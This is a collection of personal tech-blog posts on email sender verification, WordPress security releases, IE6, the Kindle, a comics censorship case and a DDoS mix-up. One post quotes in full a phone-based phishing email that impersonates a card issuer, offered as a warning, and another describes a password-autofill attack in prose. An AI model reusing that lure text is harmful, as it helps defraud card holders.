K-Squared Ramblings

Flagging (Non)-Spoofed Mail

Following up on the PayPal anti-phishing discussion of a few weeks ago, I see that PayPal is promoting a service called Iconix. You install the program on your system, and it looks at your inbox for messages that claim to be from one of its customers. It tries to verify them “using industry-standard authentication technologies such as Sender ID and DomainKeys.” Messages that pass get a lock-and-checkbox icon attached to the sender’s name, and in some cases the name is replaced by the sender’s logo.

On the tech side, it’s similar to SpamAssassin’s whitelist_from_spf and whitelist_from_dkim features. Both allow you to specify a sender to whitelist, and it will only give a message special treatment if it can verify the sender.

On the user-interface side, it’s similar to EC certificates, in that it tries to highlight a “good” class of messages rather than flag or filter out a “bad” class.

It’s not a bad idea, actually, and now that I’m surprised I haven’t seen something similar in other email clients. It’s sort of like setting up custom rings or images for images on your cell phone address book

They seem to be focused on webmail and Outlook so far, and only on Windows, but it looks like the perfect candidate for a Thunderbird extension. They do have a sign-up form to notify you when they add support for various programs and OSes, and I was pleased to see not only Thunderbird and Mac OS listed, but Linux as well. Too often, Linux gets forgotten in the shuffle to ensure compatibility with every Windows variation.

Links: Freedom and Security

The CBLDF has issued a press released detailing the victory in the Gordon Lee case. This was the case in which a comic book store in Rome, Georgia, as part of a 2004 Halloween promotion, was handing out free comics left over from that year’s Free Comic Book Day. Among over 2,000 comics, they accidentally included a copy of Alternative Comics #2, which included a story about Picasso which included him running around his studio in the nude. And they accidentally gave it to a kid. The parents wouldn’t accept an apology, and pressed charges instead. The DA has been determined to make an example out of him, pushing grossly overinflated charges including felonies that would have given him prison time. 3½ years, 3 trial dates, a mistrial for prosecutorial misconduct, and $100,000 in defense costs later, the Rome DA finally agreed to drop the case in exchange for a written letter of apology — which is exactly what the store owner had offered in the first place.

Cookie Security in WordPress 2.5. The latest version of the blogging software has a feature that can make it harder for attackers to grab your login sessions. It involves setting a pass phrase in wp-config.php, one which you’ll never have to remember, but which will be unique to your site. You have to copy the SECRET_KEY section from wp-config-sample.php and add in your passphrase…or you can generate a random code at http://api.wordpress.org/secret-key/1.0/ (be sure to put it in the middle of the file!)

The Internet Storm Center writes on Hundreds of Thousands of SQL Injections — all websites that have been hacked to host various sorts of malware.

Blocking IE6: You, Me and…PayPal?

On Thursday I stumbled across a campaign to Trash All IE Hacks. The idea is that people only stay on the ancient, buggy, feature-lacking, PITA web browser, Internet Explorer 6, because we web developers coddle them. We make the extra effort to work around those bugs, so they can actually use the sites without upgrading.

Well, yeah. That’s our job.

And a bunch of random websites blocking IE6 aren’t going to convince people to change. If I were to block IE6, or only allow Firefox, or only allow Opera, I’d have to have seriously compelling content to get people to switch. Mostly, people would get annoyed and move on. Who’s going to install a new browser just so they can read the history of the Flash? Or choose an ISP? Or buy a product that they can get from another site?

Slapping the User in the Face

It’s so easy for someone to walk away from your site. One of the tenets of good web design is to make the user jump through as few hoops as possible to accomplish whatever you want him/her to do. Every hoop you add is an obstacle. Too many obstacles, and they’ll just go somewhere else more convenient.

Back when I was following Spread Firefox, every once in a while someone would suggest blocking IE. Every time, people like me would shoot it down. Read the rest of this entry »

Webbish Links

The WaSP Buzz recently posted several links to CSS resources, including a rather thorough CSS Reference at SitePoint.

The ISC reminds us that IE7 will be pushed out to WSUS next week, which should help get rid of IE6. Yeah, I’d rather more people switched to Firefox or Opera, but I’m at the point where I’d love to be able to stop worrying about IE6’s shortcomings when trying to build sites. IE7’s shortcomings are much easier to work around. (Sorry to keep harping on this!)

The inventor of Norton Antivirus talks about computer security and has some rather interesting ideas on what policies are worth pursuing…and what policies aren’t. Long passwords? Great for protecting a stand-alone machine, but on a 10,000 machine network, they only need to crack one. Patch everything? Not every vulnerability gets exploited. I’ll have to read the Slashdot thread when I have time; that should be really *ahem* interesting.

Net Links

ISC on Targeted Attacks

Hixie’s Natural Log: Come up with the best test for Acid3 Edit: Strike that, Acid3 has been completed.

Spies in the Phishing Underground (via Slashdot)

Links: Safety Last

Forklift Driver Klaus (a.k.a. Staplerfahrer Klaus)- a parody of work safety films in which a forklift driver blunders through his first day on the job, maiming fellow employees left and right. German with English subtitles. (via TV Tropes: Scare Em Straight)

And, on a more serious note, the Internet Storm Center is reporting on people finding malware pre-installed on digital picture frames, memory cards, etc. Something to watch out for with portable devices that can connect to your computer.

Firefox, Kindle(ing) and more

Firefox 3 Beta 1 is out. Nice so far. Oddly enough, it runs better than the current Opera 9.5 previews on my old Linux box at work, though that mostly seems to be the fault of the find-in-history option.

I usually avoid any sort of shopping on the day after Thanksgiving, online included, but I’ve been getting email from various online stores that are trying to get into Black Friday. Amazon is advertising a Black Friday Sale, and Apple is promoting a “special one-day shopping event” on their website—and annoyingly, neither of them is giving any clue as to what sort of deals are involved. Amazon keeps forwarding me to today’s deals, and Apple just says something’s coming. And neither site lists actual hours. Is it midnight to midnight? What time zone?

Speaking of Amazon, their entire home page is currently taken up by the announcement of their new eBook reader, Kindle. At $400 I’m not going to rush out and buy one, but it looks like they’ve solved some of the main e-book problems: it’s small, light and wireless, and they even bring up the reading-in-bed issue in the intro. The real question is going to be compatibility & openness: It’ll read plain text, HTML, Word, and a few other document formats (and they’re promoting its access to Wikipedia), so it should be possible for other stores to sell books for the device. And what about the e-book offerings themselves? Will they be loaded down with draconian digital rights management like the Adobe ebooks of a few years ago, or are they following the model of Amazon’s MP3 store?* In a nice change, their music downloads are entirely DRM-free and they use it as a selling point. Edit: Per Andrea’s comments and further research, Kindle ebooks are locked down with DRM. No, thanks!

The name, however, makes me wonder how soon they’ll offer Fahrenheit 451.

Finally, the Internet Storm Center has an insightful response to the statement, “There is nothing on my computer that a hacker would be interested in.” Let’s leave aside the question of your personal data for the moment. Just the fact that you’ve got a computer with an internet connection could prove very useful to someone who wants to cover their tracks or just add more power to their own distributed system.

* Amazon’s MP3 store is also surprisingly cheap. I replaced my old tapes of the original cast recordings of Les Misérables (Broadway) and Phantom Of The Opera for $9 each—they run upwards of $30 on CD.

Patch…Friday?

I suppose it’s best to release the security fixes when they’re ready, because any time you pick is going to be inconvenient for someone, but lately it seems like Friday is suddenly in style.

Last Friday saw the release of PHP 5.2.4, on the Friday before—in the US, anyway—a 3-day weekend. This morning Apache released security updates for all three supported branches of their webserver. And this evening—yes, Friday evening—WordPress 2.2.3 came out.

Which reminds me, I’m going to have to start looking at the betas for WordPress 2.3. I think it’ll be a good time for a redesign. Maybe pick a new theme and tweak that one, maybe try my hand at actually designing one. I wonder if the new tagging system can import Bunny’s Technorati Tags.

WordPress 2.1.1 Security Alert

Sometime in the last 3-4 days, someone managed to alter the download for WordPress 2.1.1, adding a remotely exploitable security hole. The WordPress team has declared the release “dangerous” and has issued an update, WordPress 2.1.2, taken from the clean source plus a few fixes. If you run WordPress 2.1.1, upgrade ASAP!

Things worth noting:

• The SVN source that the developers use was not altered.
• Older versions, such as 2.0, don’t seem to have been affected.
• If you downloaded 2.1.1 when it was first released, it’s probably okay.
• 2.1.2 also includes a fix for a cross-site scripting vulnerability discovered a few days ago, so it’s worth updating anyway.

I still had the tar archive of 2.1.1 from when I grabbed it the day of the release, so I compared its contents to the 2.1.2 archive. The two files mentioned in the announcement, feed.php and theme.php, aren’t any different, confirming that the initial release was unaffected. That’s also where I saw the changes for that XSS bug.

*sigh* It’s always something…

WordPress 2.0.7 security & feed fix

Just upgraded to WordPress 2.0.7. It fixes a security issue with certain versions of PHP, and it also includes the fix for the feed problem in 2.0.6 and a couple other minor fixes.

According to the announcement, WP 2.1 should be out by the end of the month. Looks like it’s almost time to see how many of my customizations will work with the new version.

The Danger of Saving Passwords

ISC is reporting a new type of vulnerability in web browsers that the discoverer has termed as “Reverse Cross-Site Request,” or RCSR.

Basically, on a site with user-generated content—like a hosted blog—it’s possible to add a form that looks like the site’s login form. If the victim has an account on the same site, and has asked their browser to save their password, it will auto-fill the form. If the attacker can somehow trick the visitor into submitting the form—say, with an invisible image submit button (ever clicked randomly? Or to get back to the page after looking at another window?)—the attacker gets the visitor’s password.

What’s new about this is that all it requires is plain HTML, not scripting, which most blog hosts and similar sites already block.

Chapin Information Services discovered the bug in Firefox 2, and reported it to Mozilla. It turns out that Internet Explorer 6 and 7 are also vulnerable, but only if it’s on the same page as the real login form. Mozilla is currently trying to determine the best way of resolving the problem without breaking all the passwords people have already saved. The ISC article links to the bug report, so you can follow the discussion. Microsoft has only said that they’re “aware of the issue.”

At the moment, I’m glad I don’t let web browsers save my passwords.

Assault via Battery?

Received the replacement battery for the PowerBook yesterday. It was shipped out via DHL, with a prepaid return label for shipping the old battery back via regular mail.

Last night I drained the old battery, plugged the new one in, and packaged up the recalled one in the box. At lunch today I went to the post office to send it off.

As I was walking up the steps, I remembered the “Does this package contain anything liquid, explosive, or otherwise hazardous?” question that postal clerks are required to ask. If you’re mailing a defective battery that could theoretically burst into flames, how exactly are you supposed to answer?

I figured it would be best not to joke about it.

As it was, I just said it was a laptop battery straight out, so the question didn’t come up.

Back to Basics: Phish by Phone

I just spotted a rather disturbing phishing message in (of all places) our abuse contact mailbox:

Subject: Fraud Prevention Measures

Dear customer!

Due to high fraud activity we constantly increasing security level both for online banking and card transactions. In order to update our records you are required to call MBNA Card Service number at 1-800-[removed] and update information on your MBNA card.

This is free of charge and would not affect any transactions with your card. Please note this is necessary to provide highest security level for all transactions with your card.

No HTML tricks. No links to fraudulent websites. Just a phone number.

I can only assume this is a response to high-profile inclusion of antiphishing features in Internet Explorer 7 and in Firefox 2. If there’s no website, there’s nothing for a web browser to check.

And of course by not using sneaky technical tricks in the message, it’s harder for tools like ClamAV, spam filters, or mail clients to detect.

Incidentally, does anyone else find it ironic that one of the most common phishing techniques is to exploit people’s fear of being phished?

Further reading: Anti-Phishing Working Group.

WordPress Security Fix: WP 2.0.4

A few days ago, Dr. Dave of Spam Karma fame alerted WordPress users to an unspecified security issue. The workaround: disable registration of new users. Today, the WordPress folks have released WordPress 2.0.4. The security fix means it’s time to upgrade ASAP.

Hmm, I wonder if it takes care of all the bugs handled by the WordPress 2.0.3 Tuneup. Edit: It looks like it squashes 3 out of 6.

Stupid Sysadmin Tricks: Blue vs. 6A

Remember how LiveJournal, TypePad, and related sites were down the other day? The official line was that “Six Apart has been the victim of a sophisticated distributed denial of service attack.”

It turns out that the DDOS wasn’t aimed at 6A, LJ, or any other part of their network. It was aimed at Blue Security, an anti-spam company, who decided to re-route their web traffic to their blog—a blog hosted on TypePad. So instead of their own site going down, it took out Six Apart’s entire network of millions of bloggers.

Classy move, guys.

I do admire Six Apart’s restraint in not pointing fingers themselves. If it had been my site (though in a way, I suppose it was, since I’ve got an LJ blog, even if I don’t update it very often), I would have been royally pissed off.

Sure, Blue Security didn’t launch the attack—but they did choose where to redirect it. Maybe they thought Six Apart would be able to handle it. Maybe they thought the attackers were targeting them by IP and not domain name. Maybe they were panicked and didn’t think. Maybe they thought things through, but 6A got bitten by the now-all-too-familiar law of unintended consequences. They could easily have pointed their domain name at empty IP space, or to localhost. Redirecting it to a third party was less like deflecting a punch and more like the “Do it to Julia!” moment in 1984, or the classic joke, “I don’t have to outrun the bear, I only have to outrun you.”

(via Spamroll)

Update: Additional articles at Computer Business Review and at Netcraft, and a Slashdot story.

Update 2: According to Blue Security, the DDoS was not targeting their website by name, and the DDoS didn’t attack their blog until after they had already redirected the website. So it looks like it was less a case of them redirecting the attack and more a case of the attackers chasing them.

*Sigh* Must remember to collect all facts before engaging in righteous anger.

Update 3 (May 9): Apparently “all the facts” as reported by Blue Security don’t add up… (via Happy Software Prole)